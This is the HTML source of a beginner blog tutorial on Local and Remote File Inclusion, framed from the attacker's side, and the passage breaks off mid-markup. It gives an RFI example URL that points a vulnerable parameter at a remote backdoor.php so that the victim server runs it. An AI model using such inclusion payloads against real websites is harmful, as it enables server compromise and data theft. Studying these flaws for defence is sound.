font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #5e5e5e; font-family: &amp;quot;poppins&amp;quot;; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #5e5e5e; font-family: &amp;quot;poppins&amp;quot;; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Today’s article is about&amp;nbsp;&lt;b style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Local File Inclusion (LFI) and Remote File Inclusion (RFI)&lt;/b&gt;.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;If you have basic knowledge of SQL injection you probably know how we can inject our SQL queries into a vulnerable parameter.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;We take advantage of vulnerable parameters in LFI and RFI too.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #5e5e5e; font-family: &amp;quot;poppins&amp;quot;; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;In  SQL injection, we interact with the SQL database using SQL queries to  retrieve sensitive data from the database. But in LFI/RFI we ask the  webpage to open something for us, it could be a file or a webpage (a  webpage is a file too) from another website.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Enough theory! Now lets see what the heck are LFI and RFI.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #5e5e5e; font-family: &amp;quot;poppins&amp;quot;; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Local File Inclusion (LFI)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #5e5e5e; font-family: &amp;quot;poppins&amp;quot;; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Take a look a this URL:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #5e5e5e; font-family: &amp;quot;poppins&amp;quot;; font-size: 14px; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-family: Poppins; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Example :&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; font-size: 14px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 5px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;www.victim.com/open.php?view=/images/Haxor.jpg&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;background: 0px 0px rgb(255 , 255 , 255); border: 0px; color: #5e5e5e; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;The parameter in this case is view= and the value is&amp;nbsp;&lt;b style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;/images/Haxor.jpg&lt;/b&gt;.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;It  means open.php is a webpage which loads different files (Haxor.jpg in  this case) from the server. There can be many sensitive files on the  server which can be accessed using open.php if the webpage is vulnerable  to LFI.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;You  can open/execute any type of file (not folders) with LFI, which means  you can read logs, configuration files and execute files if a webpage is  vulnerable to Local File Inclusion. You can even hack into the server  if the server admin is stupid enough to not configure things properly.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Remote File Inclusion (RFI)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;/span&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;What is the difference between Local File Inclusion and Remote File Inclusion?&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Well  both vulnerabilities can be used to open things but LFI is used to open  files from the server where website is hosted (locally) while RFI is  used to open files from another server (remotely).&lt;/div&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;We can easily host a malicious file on our server and use the RFI vulnerability to run it on the victim website.&lt;/div&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Take a look at this URL:&lt;/div&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Example :&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 5px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-size: 14px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;www.victim.com/get.php?page=home&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;By looking at the above URL one would guess that the parameter page= is loading webpages.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;It  is opening home page, similarly it may open other pages from the  website. But if the webpage (get.php) is not programmed properly then a  hacker can replace home by his desired webpage like,&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;Example :&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 5px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-size: 14px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;www.victim.com/get.php?page=www.mysite.org/backdoor.php&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;outline: 0px; transition: all 0.3s ease;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; clear: both; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; text-align: center; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;https://2.bp.blogspot.com/-RGA02Xo96dU/WztvJLwbWeI/AAAAAAAAAmc/563U9IMZWt80-4d_FX7oahzwquzt4iKxgCLcBGAs/s1600/vulnrable.png&quot; imageanchor=&quot;1&quot; style=&quot;background: 0px 0px; border: 0px; clear: none; color: #16a8e1; float: none; margin-left: 1em; margin-right: 1em; outline: 0px; padding: 0px; text-decoration-line: none; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;206&quot; data-original-width=&quot;550&quot; height=&quot;238&quot; src=&quot;https://2.bp.blogspot.com/-RGA02Xo96dU/WztvJLwbWeI/AAAAAAAAAmc/563U9IMZWt80-4d_FX7oahzwquzt4iKxgCLcBGAs/s640/vulnrable.png&quot; style=&quot;background: 0px 0px; border: 0px; max-width: 100%; outline: 0px; padding: 0px; position: relative; transition: all 0.3s ease; vertical-align: baseline;&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;background: 0px 0px rgb(255, 255, 255); border: 0px; color: #5e5e5e; font-family: Poppins; font-size: 14px; line-height: 21px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; font-family: 